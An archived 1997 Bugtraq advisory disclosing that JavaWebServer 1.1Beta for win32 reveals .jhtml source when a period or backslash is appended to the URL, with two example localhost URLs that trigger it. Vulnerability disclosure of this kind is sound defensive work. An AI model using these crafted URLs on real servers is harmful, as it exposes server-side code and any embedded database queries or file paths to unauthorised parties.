[5836] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Viewable .jhtml source with JavaWebServer

daemon@ATHENA.MIT.EDU (Brian Krahmer)
Fri Dec 19 15:50:02 1997

Date: 	Wed, 16 Jul 1997 14:01:05 -0500
Reply-To: Brian Krahmer <brian@KRAHMER.COM>
From: Brian Krahmer <brian@KRAHMER.COM>
To: BUGTRAQ@NETSPACE.ORG

It has been discovered by Min Chang that there is a security
vulnerability in the 1.1Beta version of JavaWebServer for win32.
Similar to the IIS viewable source bug, if you append a '.' (period) or
a '\' (backslash) to a .jhtml URL, the server will display the source.
.jhtml files are html files with embedded Java code that are supposed to
be compiled and returned to the client (sans the java code).  Because
these files can have things like jdbc queries or important server
filenames embedded in them, it is a security risk.

examples:
http://localhost/xyz.jhtml.
or
http://localhost/xyz.jhtml\

brian
--
  Brian Krahmer - brian@krahmer.com - http://www.krahmer.com
           President, Network Guardians, Inc.
  Makers of NetGuard.  1.0 release coming after the new year!
               http://www.net-guards.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[5836] in bugtraq

Viewable .jhtml source with JavaWebServer

daemon@ATHENA.MIT.EDU (Brian Krahmer)Fri Dec 19 15:50:02 1997

daemon@ATHENA.MIT.EDU (Brian Krahmer)
Fri Dec 19 15:50:02 1997